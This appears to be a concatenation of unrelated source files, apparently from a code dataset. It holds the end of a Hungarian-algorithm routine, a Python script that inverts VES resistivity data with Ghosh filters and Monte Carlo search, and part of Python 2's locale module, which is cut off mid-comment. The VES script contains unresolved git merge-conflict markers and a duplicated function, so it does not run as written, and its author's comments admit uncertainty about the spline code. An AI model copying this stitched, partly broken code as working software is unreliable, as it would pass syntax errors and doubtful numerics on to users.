1: state.marked[path[i, 0], path[i, 1]] = 0 else: state.marked[path[i, 0], path[i, 1]] = 1 state._clear_covers() # Erase all prime markings state.marked[state.marked == 2] = 0 return _step3 def _step6(state): """ Add the value found in Step 4 to every element of each covered row, and subtract it from every element of each uncovered column. Return to Step 4 without altering any stars, primes, or covered lines. """ # the smallest uncovered value in the matrix if np.any(state.row_uncovered) and np.any(state.col_uncovered): minval = np.min(state.C[state.row_uncovered], axis=0) minval = np.min(minval[state.col_uncovered]) state.C[np.logical_not(state.row_uncovered)] += minval state.C[:, state.col_uncovered] -= minval return _step4
mit
vitale232/ves
ves/VESinverse_vectorized.py
1
12839
# -*- coding: utf-8 -*- """ Created on Thu Jan 28 16:32:48 2016 @author: jclark this code uses the Ghosh method to determine the apparent resistivities for a layered earth model. Either schlumberger or Wenner configurations can be used """ import numpy as np import random import matplotlib matplotlib.use('Qt5Agg') import matplotlib.pyplot as plt plt.style.use('bmh') import sys # Schlumberger filter fltr1 = [0., .00046256, -.0010907, .0017122, -.0020687, .0043048, -.0021236, .015995, .017065, .098105, .21918, .64722, 1.1415, .47819, -3.515, 2.7743, -1.201, .4544, -.19427, .097364, -.054099, .031729, -.019109, .011656, -.0071544, .0044042, -.002715, .0016749, -.0010335, .00040124] #Wenner Filter fltr2 = [0., .000238935, .00011557, .00017034, .00024935, .00036665, .00053753, .0007896, .0011584, .0017008, .0024959, .003664, .0053773, .007893, .011583, .016998, .024934, .036558, .053507, .078121, .11319, .16192, .22363, .28821, .30276, .15523, -.32026, -.53557, .51787, -.196, .054394, -.015747, .0053941, -.0021446, .000665125] print(len(fltr1)) print(len(fltr2)) #I know there must be a better method to assign lists. And probably numpy #arrays would be best. But my Python wasn't up to it. If the last letter #is an 'l' that means it is a log10 of the value # 65 is completely arbitrary p = [0] * 20 # earth layer parameters? r = [0] * 65 # apparent resistivty? rl = [0] * 65 # np.log(r) ? t = [0] * 50 # b = [0] * 65 # asav = [0] * 65 # voltage spacing in meters? asavl = [0] * 65 # np.log(asav) adatl = [0] * 65 # interpolated voltage spacing ( np.log(10) / 6 )? rdatl = [0] * 65 # np.log() # adat = [0] * 65 # voltage spacing input # rdat = [0] * 65 # apparent res input pkeep = [0] * 65 # earth parameters after applying equations? rkeep = [0] * 65 # r after applying equations? rkeepl = [0] * 65 # np.log()! pltanswer = [0] * 65 pltanswerl = [0] * 65 pltanswerkeep = [0] * 65 pltanswerkeepl = [0] * 65 rl = [0] * 65 small = [0] * 65 xlarge = [0] * 65 x=[0] * 100 y = [0] * 100 y2 = [0] * 100 u = [0] * 5000 new_x = [0] * 1000 new_y = [0] * 1000 ndat = 13 #hard coded data input - spacing and apparent resistivities measured #in teh field adat = [0., 0.55, 0.95, 1.5, 2.5, 3., 4.5, 5.5, 9., 12., 20., 30., 70.] rdat = [0., 125., 110., 95., 40., 24., 15., 10.5, 8., 6., 6.5, 11., 25.] one30 = 1.e30 # What's the purpose of this and should it be user input? rms = one30 # Just a starting value for rmserror? errmin = 1.e10 # Should this be user input? # INPUT array_spacing = 'wenner' # 1 is for shchlumberger and 2 is for Wenner nLayers = 3 #number of layers n = 2 * nLayers - 1 # What does n represent? number of parameters spac = 0.2 # smallest electrode spacing - should this come from the input file? m = 20 # number of points where resistivity is calculated spac = np.log(spac) delx = np.log(10.0) / 6. # I take it this is the sample interval on the log scale? # this is where the range in parameters should be input from a GUI # I'm hard coding this in for now #enter thickenss range for each layer and then resistivity range. #for 3 layers small[1] and small[2] are low end of thickness range # small[3], small[4] and small[5] are the low end of resistivities # I think I have it coded up that these are getting grabbed from the rectangles currently. # Is that the best way to go? small[1] = 1. small[2] = 10. small[3] = 20. small[4] = 2. small[5] = 500. xlarge[1] = 5 xlarge[2] = 75. xlarge[3] = 200. xlarge[4] = 100 xlarge[5] = 3000. iter_ = 10000 #number of iterations for the Monte Carlo guesses. to be input on GUI # Is 10000 the most reasonable default, or should I play with it? def readData(adat, rdat, ndat, return_indexed=False): #normally this is where the data would be read from the csv file # but now I'm just hard coding it in as global lists for i in range(1, ndat): adatl[i] = np.log10(adat[i]) rdatl[i] = np.log10(rdat[i]) if return_indexed: return adatl[:ndat], rdatl[:ndat] else: return adatl, rdatl <<<<<<< HEAD ======= def error(): # simple rms error calc sumerror = 0. #pltanswer = [0]*64 spline(m, one30, one30, asavl, rl, y2) # So this calculates the predicted fit? # and essentially operates on the list in place? for i in range(1, ndat): # So you always skip the value 0? due to -inf returns? ans = splint(m, adatl[i], asavl, rl, y2) # Then this calulates error? sumerror = sumerror + (rdatl[i] - ans) * (rdatl[i] - ans) #print(i,sum1,rdat[i],rdatl[i],ans) pltanswerl[i] = ans pltanswer[i] = np.power(10, ans) rms = np.sqrt(sumerror / (ndat - 1)) # check the spline routine # for i in range(1,m+1,1): # anstest = splint(m, asavl[i],asavl,rl,y2) # print( asavl[i], rl[i], anstest) #print(' rms = ', rms) # if you erally want to get a good idea of all perdictions from Montecarlo # perform the following plot (caution - change iter to a smaller number) #plt.loglog(adat[1:ndat],pltanswer[1:ndat]) return rms >>>>>>> 60497dd... ?s def transf(y, i): # these lines apparently find the computer precision ep ep = 1.0 ep = ep / 2.0 fctr = ep + 1. while fctr > 1.: ep = ep / 2.0 fctr = ep + 1. u = 1. / np.exp(y) # y = spac - 19. * delx - 0.13069 t[1] = p[n] for j in range(2, nLayers + 1, 1): pwr = -2. * u * p[nLayers + 1 - j] if pwr < np.log(2. * ep): pwr = np.log(2. * ep) a = np.exp(pwr) b = (1. - a) / (1. + a) rs = p[n + 1 - j] tpr = b * rs t[j] = (tpr + t[j - 1]) / (1. + tpr * t[j - 1] / (rs * rs)) r[i] = t[nLayers] return def filters(b, k): for i in range(1, m + 1): re = 0. for j in range(1, k + 1): re = re + b[j] * r[i + k - j] # include ranges of thickness, res . push button for rmse error, observed data # surf thicknes .2 - 100 # res 2-3000 # could use huge ranges at cost of time r[i] = re return def rmsfit(): if array_spacing.lower() == 'wenner': y = spac - 19. * delx - 0.13069 mum1 = m + 28 for i in range(1, mum1 + 1): transf(y, i) y = y + delx filters(fltr1, 29) elif array_spacing.lower() == 'schlumberger': s = np.log(2.) y = spac - 10.8792495 * delx mum2 = m + 33 for i in range(1, mum2 + 1): transf(y, i) a = r[i] y1 = y + s transf(y1, i) r[i] = 2. * a - r[i] y = y + delx filters(fltr2, 34) else: print("\nType of survey not indicated.") raise SystemExit('Exiting.\n\n Take better care next time.') x = spac #print("A-Spacing App. Resistivity") for i in range(1, m + 1): a = np.exp(x) asav[i] = a asavl[i] = np.log10(a) rl[i] = np.log10(r[i]) x = x + delx #print("%7.2f %9.3f " % ( asav[i], r[i])) rms = error() return rms def error(): # simple rms error calc sumerror = 0. #pltanswer = [0]*64 spline(m, one30, one30, asavl, rl, y2) # So this calculates the predicted fit? # and essentially operates on the list in place? for i in range(1, ndat): # So you always skip the value 0? due to -inf returns? ans = splint(m, adatl[i], asavl, rl, y2) # Then this calulates error? sumerror = sumerror + (rdatl[i] - ans) * (rdatl[i] - ans) #print(i,sum1,rdat[i],rdatl[i],ans) pltanswerl[i] = ans pltanswer[i] = np.power(10, ans) rms = np.sqrt(sumerror / (ndat - 1)) # check the spline routine # for i in range(1,m+1,1): # anstest = splint(m, asavl[i],asavl,rl,y2) # print( asavl[i], rl[i], anstest) #print(' rms = ', rms) # if you erally want to get a good idea of all perdictions from Montecarlo # perform the following plot (caution - change iter to a smaller number) #plt.loglog(adat[1:ndat],pltanswer[1:ndat]) return rms # my code to do a spline fit to predicted data at the nice spacing of Ghosh # use splint to determine the spline interpolated prediction at the # spacing where the measured resistivity was taken - to compare observation # to prediction def spline(n, yp1, ypn, x=[] ,y=[] ,y2=[]): """Still struggling to understand the general operation of this function.""" u = [0] * 1000 one29 = 0.99e30 #print(x,y) if yp1 > one29: y2[0] = 0. u[0] = 0. else: y2[0] = -0.5 u[0] = (3. / (x[1] - x[0])) * ((y[1] - y[0]) / (x[1] - x[0]) - yp1) for i in range(1, n): #print(i,x[i]) sig = (x[i] - x[i-1]) / (x[i+1] - x[i-1]) p=sig * y2[i - 1] + 2. y2[i] = (sig-1.) / p u[i] = (((6. * ((y[i+1] - y[i]) / (x[i+1] - x[i]) - (y[i] - y[i-1]) / x[i] - x[i-1])) / (x[i + 1] - x[i - 1]) - sig * u[i - 1]) / p) if ypn > one29: qn = 0. un = 0. else: qn = 0.5 un = (3. / (x[n] - x[n - 1])) * (ypn - (y[n] - y[n - 1]) / (x[n] - x[n - 1])) y2[n] = (un - qn * u[n - 1]) / (qn * y2[n - 1] + 1.) for k in range(n-1, -1, -1): y2[k] = y2[k] * y2[k + 1] + u[k] return def splint(n, x ,xa=[], ya=[], y2a=[]): # Is this function the T function? """Still struggling to understand the general operation of this function.""" klo = 0 khi = n while khi - klo > 1: k = int((khi + klo) // 2) if xa[k] > x: khi = k else: klo = k h = xa[khi] - xa[klo] if abs(h) < 1e-20: print(" bad xa input") #print(x,xa[khi],xa[klo]) a = (xa[khi] - x) / h b = (x - xa[klo]) / h y = (a * ya[klo] + b * ya[khi] + ((a * a * a - a) * y2a[klo] + (b * b * b - b) * y2a[khi]) * (h * h) /6.) #print("x= ", x,"y= ", y, " ya= ", ya[khi]," y2a= ", y2a[khi], " h= ",h) return y #main here if __name__ == '__main__': adatl, rdatl = readData(adat, rdat, ndat, return_indexed=False) print(adat[1:ndat],rdat[1:ndat]) print('log stufffff') print(adatl[1:ndat], rdatl[1:ndat]) # is this to skip 0? #enter thickenss range for each layer and then resistivity range. #for 3 layers small[1] and small[2] are low end of thickness range # small[3], small[4] and small[5] are the low end of resistivities for iloop in range(1, int(iter_/2) + 1): #print( ' iloop is ', iloop) for i in range(1, n + 1): # number of parameters + 1 randNumber = random.random() # IS this just to add noise to the model? # #print(randNumber, ' random') # print(xlarge) # print(small) # s = input('') # print('xlarge[i]: {}, small[i]: {}'.format(xlarge[i], small[i])) p[i] = (xlarge[i] - small[i]) * randNumber + small[i] # print(p) print('\n') print(p) # s = input('') rms = rmsfit() if rms < errmin: print('rms ', rms, ' errmin ', errmin) for i in range(1, n + 1): pkeep[i] = p[i] for i in range(1, m + 1): rkeep[i] = r[i] rkeepl[i] = rl[i] for i in range(1, ndat + 1): pltanswerkeepl[i] = pltanswerl[i] pltanswerkeep[i] = pltanswer[i] errmin = rms #output the best fitting earth model print(' Layer ', ' Thickness ', ' Res_ohm-m ') for i in range(1,nLayers,1): print(i, pkeep[i], pkeep[nLayers+i-1]) print( nLayers, ' Infinite ', pkeep[n]) for i in range(1,m+1, 1): asavl[i] = np.log10(asav[i]) #output the error of fit print( ' RMS error ', errmin) print( ' Spacing', ' Res_pred ', ' Log10_spacing ', ' Log10_Res_pred ') for i in range(1,m+1,1): #print(asav[i], rkeep[i], asavl[i], rkeepl[i]) print("%7.2f %9.3f %9.3f %9.3f" % ( asav[i], rkeep[i], asavl[i], rkeepl[i])) print('plot a lot') plt.loglog(asav[1:m],rkeep[1:m],'-') # resistivity prediction curve plt.loglog(adat[1:ndat],pltanswerkeep[1:ndat], 'ro') # predicted data red dots s=7 plt.loglog(adat[1:ndat],rdat[1:ndat],'bo',markersize=s) #original data blue dots plt.show() plt.grid(True) sys.exit(0)
lgpl-3.0
cluckmaster/MissionPlanner
Lib/locale.py
50
90840
""" Locale support. The module provides low-level access to the C lib's locale APIs and adds high level number formatting APIs as well as a locale aliasing engine to complement these. The aliasing engine includes support for many commonly used locale names and maps them to values suitable for passing to the C lib's setlocale() function. It also includes default encodings for all supported locale names. """ import sys import encodings import encodings.aliases import re import operator import functools # Try importing the _locale module. # # If this fails, fall back on a basic 'C' locale emulation. # Yuck: LC_MESSAGES is non-standard: can't tell whether it exists before # trying the import. So __all__ is also fiddled at the end of the file. __all__ = ["getlocale", "getdefaultlocale", "getpreferredencoding", "Error", "setlocale", "resetlocale", "localeconv", "strcoll", "strxfrm", "str", "atof", "atoi", "format", "format_string", "currency", "normalize", "LC_CTYPE", "LC_COLLATE", "LC_TIME", "LC_MONETARY", "LC_NUMERIC", "LC_ALL", "CHAR_MAX"] try: from _locale import * except ImportError: # Locale emulation CHAR_MAX = 127 LC_ALL = 6 LC_COLLATE = 3 LC_CTYPE = 0 LC_MESSAGES = 5 LC_MONETARY = 4 LC_NUMERIC = 1 LC_TIME = 2 Error = ValueError def localeconv(): """ localeconv() -> dict. Returns numeric and monetary locale-specific parameters. """ # 'C' locale default values return {'grouping': [127], 'currency_symbol': '', 'n_sign_posn': 127, 'p_cs_precedes': 127, 'n_cs_precedes': 127, 'mon_grouping': [], 'n_sep_by_space': 127, 'decimal_point': '.', 'negative_sign': '', 'positive_sign': '', 'p_sep_by_space': 127, 'int_curr_symbol': '', 'p_sign_posn': 127, 'thousands_sep': '', 'mon_thousands_sep': '', 'frac_digits': 127, 'mon_decimal_point': '', 'int_frac_digits': 127} def setlocale(category, value=None): """ setlocale(integer,string=None) -> string. Activates/queries locale processing. """ if value not in (None, '', 'C'): raise Error, '_locale emulation only supports "C" locale' return 'C' def strcoll(a,b): """ strcoll(string,string) -> int. Compares two strings according to the locale. """ return cmp(a,b) def strxfrm(s): """ strxfrm(string) -> string. Returns a string that behaves for cmp locale-aware. """ return s _localeconv = localeconv # With this dict, you can override some items of localeconv's return value. # This is useful for testing purposes. _override_localeconv = {} @functools.wraps(_localeconv) def localeconv(): d = _localeconv() if _override_localeconv: d.update(_override_localeconv) return d ### Number formatting APIs # Author: Martin von Loewis # improved by Georg Brandl # Iterate over grouping intervals def _grouping_intervals(grouping): last_interval = None for interval in grouping: # if grouping is -1, we are done if interval == CHAR_MAX: return # 0: re-use last group ad infinitum if interval == 0: if last_interval is None: raise ValueError("invalid grouping") while True: yield last_interval yield interval last_interval = interval #perform the grouping from right to left def _group(s, monetary=False): conv = localeconv() thousands_sep = conv[monetary and 'mon_thousands_sep' or 'thousands_sep'] grouping = conv[monetary and 'mon_grouping' or 'grouping'] if not grouping: return (s, 0) result = "" seps = 0 if s[-1] == ' ': stripped = s.rstrip() right_spaces = s[len(stripped):] s = stripped else: right_spaces = '' left_spaces = '' groups = [] for interval in _grouping_intervals(grouping): if not s or s[-1] not in "0123456789": # only non-digit characters remain (sign, spaces) left_spaces = s s = '' break groups.append(s[-interval:]) s = s[:-interval] if s: groups.append(s) groups.reverse() return ( left_spaces + thousands_sep.join(groups) + right_spaces, len(thousands_sep) * (len(groups) - 1) ) # Strip a given amount of excess padding from the given string def _strip_padding(s, amount): lpos = 0 while amount and s[lpos] == ' ': lpos += 1 amount -= 1 rpos = len(s) - 1 while amount and s[rpos] == ' ': rpos -= 1 amount -= 1 return s[lpos:rpos+1] _percent_re = re.compile(r'%(?:\((?P<key>.*?)\))?' r'(?P<modifiers>[-#0-9 +*.hlL]*?)[eEfFgGdiouxXcrs%]') def format(percent, value, grouping=False, monetary=False, *additional): """Returns the locale-aware substitution of a %? specifier (percent). additional is for format strings which contain one or more '*' modifiers.""" # this is only for one-percent-specifier strings and this should be checked match = _percent_re.match(percent) if not match or len(match.group())!= len(percent): raise ValueError(("format() must be given exactly one %%char " "format specifier, %s not valid") % repr(percent)) return _format(percent, value, grouping, monetary, *additional) def _format(percent, value, grouping=False, monetary=False, *additional): if additional: formatted = percent % ((value,) + additional) else: formatted = percent % value # floats and decimal ints need special action! if percent[-1] in 'eEfFgG': seps = 0 parts = formatted.split('.') if grouping: parts[0], seps = _group(parts[0], monetary=monetary) decimal_point = localeconv()[monetary and 'mon_decimal_point' or 'decimal_point'] formatted = decimal_point.join(parts) if seps: formatted = _strip_padding(formatted, seps) elif percent[-1] in 'diu': seps = 0 if grouping: formatted, seps = _group(formatted, monetary=monetary) if seps: formatted = _strip_padding(formatted, seps) return formatted def format_string(f, val, grouping=False): """Formats a string in the same way that the % formatting would use, but takes the current locale into account. Grouping is applied if the third parameter is true.""" percents = list(_percent_re.finditer(f)) new_f = _percent_re.sub('%s', f) if operator.isMappingType(val): new_val = [] for perc in percents: if perc.group()[-1]=='%': new_val.append('%') else: new_val.append(format(perc.group(), val, grouping)) else: if not isinstance(val, tuple): val = (val,) new_val = [] i = 0 for perc in percents: if perc.group()[-1]=='%': new_val.append('%') else: starcount = perc.group('modifiers').count('*') new_val.append(_format(perc.group(), val[i], grouping, False, *val[i+1:i+1+starcount])) i += (1 + starcount) val = tuple(new_val) return new_f % val def currency(val, symbol=True, grouping=False, international=False): """Formats val according to the currency settings in the current locale.""" conv = localeconv() # check for illegal values digits = conv[international and 'int_frac_digits' or 'frac_digits'] if digits == 127: raise ValueError("Currency formatting is not possible using " "the 'C' locale.") s = format('%%.%if' % digits, abs(val), grouping, monetary=True) # '<' and '>' are markers if the sign must be inserted between symbol and value s = '<' + s + '>' if symbol: smb = conv[international and 'int_curr_symbol' or 'currency_symbol'] precedes = conv[val<0 and 'n_cs_precedes' or 'p_cs_precedes'] separated = conv[val<0 and 'n_sep_by_space' or 'p_sep_by_space'] if precedes: s = smb + (separated and ' ' or '') + s else: s = s + (separated and ' ' or '') + smb sign_pos = conv[val<0 and 'n_sign_posn' or 'p_sign_posn'] sign = conv[val<0 and 'negative_sign' or 'positive_sign'] if sign_pos == 0: s = '(' + s + ')' elif sign_pos == 1: s = sign + s elif sign_pos == 2: s = s + sign elif sign_pos == 3: s = s.replace('<', sign) elif sign_pos == 4: s = s.replace('>', sign) else: # the default if nothing specified; # this should be the most fitting sign position s = sign + s return s.replace('<', '').replace('>', '') def str(val): """Convert float to integer, taking the locale into account.""" return format("%.12g", val) def atof(string, func=float): "Parses a string as a float according to the locale settings." #First, get rid of the grouping ts = localeconv()['thousands_sep'] if ts: string = string.replace(ts, '') #next, replace the decimal point with a dot dd = localeconv()['decimal_point'] if dd: string = string.replace(dd, '.') #finally, parse the string return func(string) def atoi(str): "Converts a string to an integer according to the locale settings." return atof(str, int) def _test(): setlocale(LC_ALL, "") #do grouping s1 = format("%d", 123456789,1) print s1, "is", atoi(s1) #standard formatting s1 = str(3.14) print s1, "is", atof(s1) ### Locale name aliasing engine # Author: Marc-Andre Lemburg, mal@lemburg.com # Various tweaks by Fredrik Lundh <fredrik@pythonware.com> # store away the low-level version of setlocale (it's # overridden below) _setlocale = setlocale def normalize(localename): """ Returns a normalized locale code for the given locale name. The returned locale code is formatted for use with setlocale(). If normalization fails, the original name is returned unchanged. If the given encoding is not known, the function defaults to the default encoding for the locale code just like setlocale() does. """ # Normalize the locale name and extract the encoding fullname = localename.lower() if ':' in fullname: # ':' is sometimes used as encoding delimiter. fullname = fullname.replace(':', '.') if '.' in fullname: langname, encoding = fullname.split('.')[:2] fullname = langname + '.' + encoding else: langname = fullname encoding = '' # First lookup: fullname (possibly with encoding) norm_encoding = encoding.replace('-', '') norm_encoding = norm_encoding.replace('_', '') lookup_name = langname + '.' + encoding code = locale_alias.get(lookup_name, None) if code is not None: return code #print 'first lookup failed' # Second try: langname (without encoding) code = locale_alias.get(langname, None) if code is not None: #print 'langname lookup succeeded' if '.' in code: langname, defenc = code.split('.') else: langname = code defenc = '' if encoding: # Convert the encoding to a C lib compatible encoding string norm_encoding = encodings.normalize_encoding(encoding) #print 'norm encoding: %r' % norm_encoding norm_encoding = encodings.aliases.aliases.get(norm_encoding, norm_encoding) #print 'aliased encoding: %r' % norm_encoding encoding = locale_encoding_alias.get(norm_encoding, norm_encoding) else: encoding = defenc #print 'found encoding %r' % encoding if encoding: return langname + '.' + encoding else: return langname else: return localename def _parse_localename(localename): """ Parses the locale code for localename and returns the result as tuple (language code, encoding). The localename is normalized and passed through the locale alias engine. A ValueError is raised in case the locale name cannot be parsed. The language code corresponds to RFC 1766. code and encoding can be None in case the values cannot be determined or are unknown to this implementation. """ code = normalize(localename) if '@' in code: # Deal with locale modifiers code, modifier = code.split('@') if modifier == 'euro' and '.' not in code: # Assume Latin-9 for @euro locales. This is bogus, # since some systems may use other encodings for these # locales. Also, we ignore other modifiers. return code, 'iso-8859-15' if '.' in code: return tuple(code.split('.')[:2]) elif code == 'C': return None, None raise ValueError, 'unknown locale: %s' % localename def _build_localename(localetuple): """ Builds a locale code from the given tuple (language code, encoding). No aliasing or normalizing takes place. """ language, encoding = localetuple if language is None: language = 'C' if encoding is None: return language else: return language + '.' + encoding def getdefaultlocale(envvars=('LC_ALL', 'LC_CTYPE', 'LANG', 'LANGUAGE')): """ Tries to determine the default locale settings and returns them as tuple (language code, encoding). According to POSIX, a program which has not called setlocale(LC_ALL, "") runs using the portable 'C' locale. Calling setlocale(LC_ALL, "") lets it use the default locale as defined by the LANG variable. Since we don't want to interfere with the current locale setting we thus emulate the behavior in the way described above. To maintain compatibility with other platforms, not only the LANG variable is tested, but a list of variables given as envvars parameter. The first found to be defined will be used. envvars defaults to the search path used in GNU gettext; it must always contain the variable name 'LANG'. Except for the code 'C', the language code corresponds to RFC 1766. code and encoding can be None in case the values cannot be determined. """ try: # check if it's supported by the _locale module import _locale code, encoding = _locale._getdefaultlocale() except (ImportError, AttributeError): pass else: # make sure the code/encoding values are valid if sys.platform == "win32" and code and code[:2] == "0x": # map windows language identifier to language name code = windows_locale.get(int(code, 0)) # ...add other platform-specific processing here, if # necessary... return code, encoding # fall back on POSIX behaviour import os lookup = os.environ.get for variable in envvars: localename = lookup(variable,None) if localename: if variable == 'LANGUAGE': localename = localename.split(':')[0] break else: localename = 'C' return _parse_localename(localename) def getlocale(category=LC_CTYPE): """ Returns the current setting for the given locale category as tuple (language code, encoding). category may be one of the LC_* value except LC_ALL. It defaults to LC_CTYPE. Except for the code 'C', the language code corresponds to RFC 1766. code and encoding can be None in case the values cannot be determined. """ localename = _setlocale(category) if category == LC_ALL and ';' in localename: raise TypeError, 'category LC_ALL is not supported' return _parse_localename(localename) def setlocale(category, locale=None): """ Set the locale for the given category. The locale can be a string, a locale tuple (language code, encoding), or None. Locale tuples are converted to strings the locale aliasing engine. Locale strings are passed directly to the C lib. category may be given as one of the LC_* values. """ if locale and type(locale) is not type(""): # convert to string locale = normalize(_build_localename(locale)) return _setlocale(category, locale) def resetlocale(category=LC_ALL): """ Sets the locale for category to the default setting. The default setting is determined by calling getdefaultlocale(). category defaults to LC_ALL. """ _setlocale(category, _build_localename(getdefaultlocale())) if sys.platform.startswith("win"): # On Win32, this will return the ANSI code page def getpreferredencoding(do_setlocale = True): """Return the charset that the user is likely using.""" import _locale return _locale._getdefaultlocale()[1] else: # On Unix, if CODESET is available, use that. try: CODESET except NameError: # Fall back to parsing environment variables :-( def getpreferredencoding(do_setlocale = True): """Return the charset that the user is likely using, by looking at environment variables.""" return getdefaultlocale()[1] else: def getpreferredencoding(do_setlocale = True): """Return the charset that the user is likely using, according to the system configuration.""" if do_setlocale: oldloc = setlocale(LC_CTYPE) try: setlocale(LC_CTYPE, "") except Error: pass result = nl_langinfo(CODESET) setlocale(LC_CTYPE, oldloc) return result else: return nl_langinfo(CODESET) ### Database # # The following data was extracted from the locale.alias file which # comes with X11 and then hand edited removing the explicit encoding # definitions and adding some more aliases. The file is usually # available as /usr/lib/X11/locale/locale.alias. # # # The local_encoding_alias table maps lowercase encoding alias names # to C locale encoding names (case-sensitive). Note that normalize() # first looks up the encoding in the encodings.aliases dictionary and # then applies this mapping to find the correct C lib name for the # encoding. # locale_encoding_alias = { # Mappings for non-standard encoding names used in locale names '437': 'C', 'c': 'C', 'en': 'ISO8859-1', 'jis': 'JIS7', 'jis7': 'JIS7', 'ajec': 'eucJP', # Mappings from Python codec names to C lib encoding names 'ascii': 'ISO8859-1', 'latin_1': 'ISO8859-1', 'iso8859_1': 'ISO8859-1', 'iso8859_10': 'ISO8859-10', 'iso8859_11': 'ISO8859-11', 'iso8859_13': 'ISO8859-13', 'iso8859_14': 'ISO8859-14', 'iso8859_15': 'ISO8859-15', 'iso8859_16': 'ISO8859-16', 'iso8859_2': 'ISO8859-2', 'iso8859_3': 'ISO8859-3', 'iso8859_4': 'ISO8859-4', 'iso8859_5': 'ISO8859-5', 'iso8859_6': 'ISO8859-6', 'iso8859_7': 'ISO8859-7', 'iso8859_8': 'ISO8859-8', 'iso8859_9': 'ISO8859-9', 'iso2022_jp': 'JIS7', 'shift_jis': 'SJIS', 'tactis': 'TACTIS', 'euc_jp': 'eucJP', 'euc_kr': 'eucKR', 'utf_8': 'UTF-8', 'koi8_r': 'KOI8-R', 'koi8_u': 'KOI8-U', # XXX This list is still incomplete. If you know more # mappings, please file a bug report. Thanks. } # # The locale_alias table maps lowercase alias names to C locale names # (case-sensitive). Encodings are always separated from the locale # name using a dot ('.'); they should only be given in case the # language name is needed to interpret the given encoding alias # correctly (CJK codes often have this need). # # Note that the normalize() function which uses this tables # removes '_' and '-' characters from the encoding part of the # locale name before doing the lookup. This saves a lot of # space in the table. # # MAL 2004-12-10: # Updated alias mapping to most recent locale.alias file # from X.org distribution using makelocalealias.py. # # These are the differences compared to the old mapping (Python 2.4 # and older): # # updated 'bg' -> 'bg_BG.ISO8859-5' to 'bg_BG.CP1251' # updated 'bg_bg' -> 'bg_BG.ISO8859-5' to 'bg_BG.CP1251' # updated 'bulgarian' -> 'bg_BG.ISO8859-5' to 'bg_BG.CP1251' # updated 'cz' -> 'cz_CZ.ISO8859-2' to 'cs_CZ.ISO8859-2' # updated 'cz_cz' -> 'cz_CZ.ISO8859-2' to 'cs_CZ.ISO8859-2' # updated 'czech' -> 'cs_CS.ISO8859-2' to 'cs_CZ.ISO8859-2' # updated 'dutch' -> 'nl_BE.ISO8859-1' to 'nl_NL.ISO8859-1' # updated 'et' -> 'et_EE.ISO8859-4' to 'et_EE.ISO8859-15' # updated 'et_ee' -> 'et_EE.ISO8859-4' to 'et_EE.ISO8859-15' # updated 'fi' -> 'fi_FI.ISO8859-1' to 'fi_FI.ISO8859-15' # updated 'fi_fi' -> 'fi_FI.ISO8859-1' to 'fi_FI.ISO8859-15' # updated 'iw' -> 'iw_IL.ISO8859-8' to 'he_IL.ISO8859-8' # updated 'iw_il' -> 'iw_IL.ISO8859-8' to 'he_IL.ISO8859-8' # updated 'japanese' -> 'ja_JP.SJIS' to 'ja_JP.eucJP' # updated 'lt' -> 'lt_LT.ISO8859-4' to 'lt_LT.ISO8859-13' # updated 'lv' -> 'lv_LV.ISO8859-4' to 'lv_LV.ISO8859-13' # updated 'sl' -> 'sl_CS.ISO8859-2' to 'sl_SI.ISO8859-2' # updated 'slovene' -> 'sl_CS.ISO8859-2' to 'sl_SI.ISO8859-2' # updated 'th_th' -> 'th_TH.TACTIS' to 'th_TH.ISO8859-11' # updated 'zh_cn' -> 'zh_CN.eucCN' to 'zh_CN.gb2312' # updated 'zh_cn.big5' -> 'zh_TW.eucTW' to 'zh_TW.big5' # updated 'zh_tw' -> 'zh_TW.eucTW' to 'zh_TW.big5' # # MAL 2008-05-30: # Updated alias mapping to most recent locale.alias file # from X.org distribution using makelocalealias.py. # # These are the differences compared to the old mapping (Python 2.5 # and older): # # updated 'cs_cs.iso88592' -> 'cs_CZ.ISO8859-2' to 'cs_CS.ISO8859-2' # updated 'serbocroatian' -> 'sh_YU.ISO8859-2' to 'sr_CS.ISO8859-2' # updated 'sh' -> 'sh_YU.ISO8859-2' to 'sr_CS.ISO8859-2' # updated 'sh_hr.iso88592' -> 'sh_HR.ISO8859-2' to 'hr_HR.ISO8859-2' # updated 'sh_sp' -> 'sh_YU.ISO8859-2' to 'sr_CS.ISO8859-2' # updated 'sh_yu' -> 'sh_YU.ISO8859-2' to 'sr_CS.ISO8859-2' # updated 'sp' -> 'sp_YU.ISO8859-5' to 'sr_CS.ISO8859-5' # updated 'sp_yu' -> 'sp_YU.ISO8859-5' to 'sr_CS.ISO8859-5' # updated 'sr' -> 'sr_YU.ISO8859-5' to 'sr_CS.ISO8859-5' # updated 'sr@cyrillic' -> 'sr_YU.ISO8859-5' to 'sr_CS.ISO8859-5' # updated 'sr_sp' -> 'sr_SP.ISO8859-2' to 'sr_CS.ISO8859-2' # updated 'sr_yu' -> 'sr_YU.ISO8859-5' to 'sr_CS.ISO8859-5' # updated 'sr_yu.cp1251@cyrillic' -> 'sr_YU.CP1251' to 'sr_CS.CP1251' # updated 'sr_yu.iso88592' -> 'sr_YU.ISO8859-2' to 'sr_CS.ISO8859-2' # updated 'sr_yu.iso88595' -> 'sr_YU.ISO8859-5' to 'sr_CS.ISO8859-5' # updated 'sr_yu.iso88595@cyrillic' -> 'sr_YU.ISO8859-5' to 'sr_CS.ISO8859-5' # updated 'sr_yu.microsoftcp1251@cyrillic' -> 'sr_YU.CP1251' to 'sr_CS.CP1251' # updated 'sr_yu.utf8@cyrillic' -> 'sr_YU.UTF-8' to 'sr_CS.UTF-8' # updated 'sr_yu@cyrillic' -> 'sr_YU.ISO8859-5' to 'sr_CS.ISO8859-5' # # AP 2010-04-12: # Updated alias mapping to most recent locale.alias file # from X.org distribution using makelocalealias.py. # # These are the differences compared to the old mapping (Python 2.6.5 # and older): # # updated 'ru' -> 'ru_RU.ISO8859-5' to 'ru_RU.UTF-8' # updated 'ru_ru' -> 'ru_RU.ISO8859-5' to 'ru_RU.UTF-8' # updated 'serbocroatian' -> 'sr_CS.ISO8859-2' to 'sr_RS.UTF-8@latin' # updated 'sh' -> 'sr_CS.ISO8859-2' to 'sr_RS.UTF-8@latin' # updated 'sh_yu' -> 'sr_CS.ISO8859-2' to 'sr_RS.UTF-8@latin' # updated 'sr' -> 'sr_CS.ISO8859-5' to 'sr_RS.UTF-8' # updated 'sr@cyrillic' -> 'sr_CS.ISO8859-5' to 'sr_RS.UTF-8' # updated 'sr@latn' -> 'sr_CS.ISO8859-2' to 'sr_RS.UTF-8@latin' # updated 'sr_cs.utf8@latn' -> 'sr_CS.UTF-8' to 'sr_RS.UTF-8@latin' # updated 'sr_cs@latn' -> 'sr_CS.ISO8859-2' to 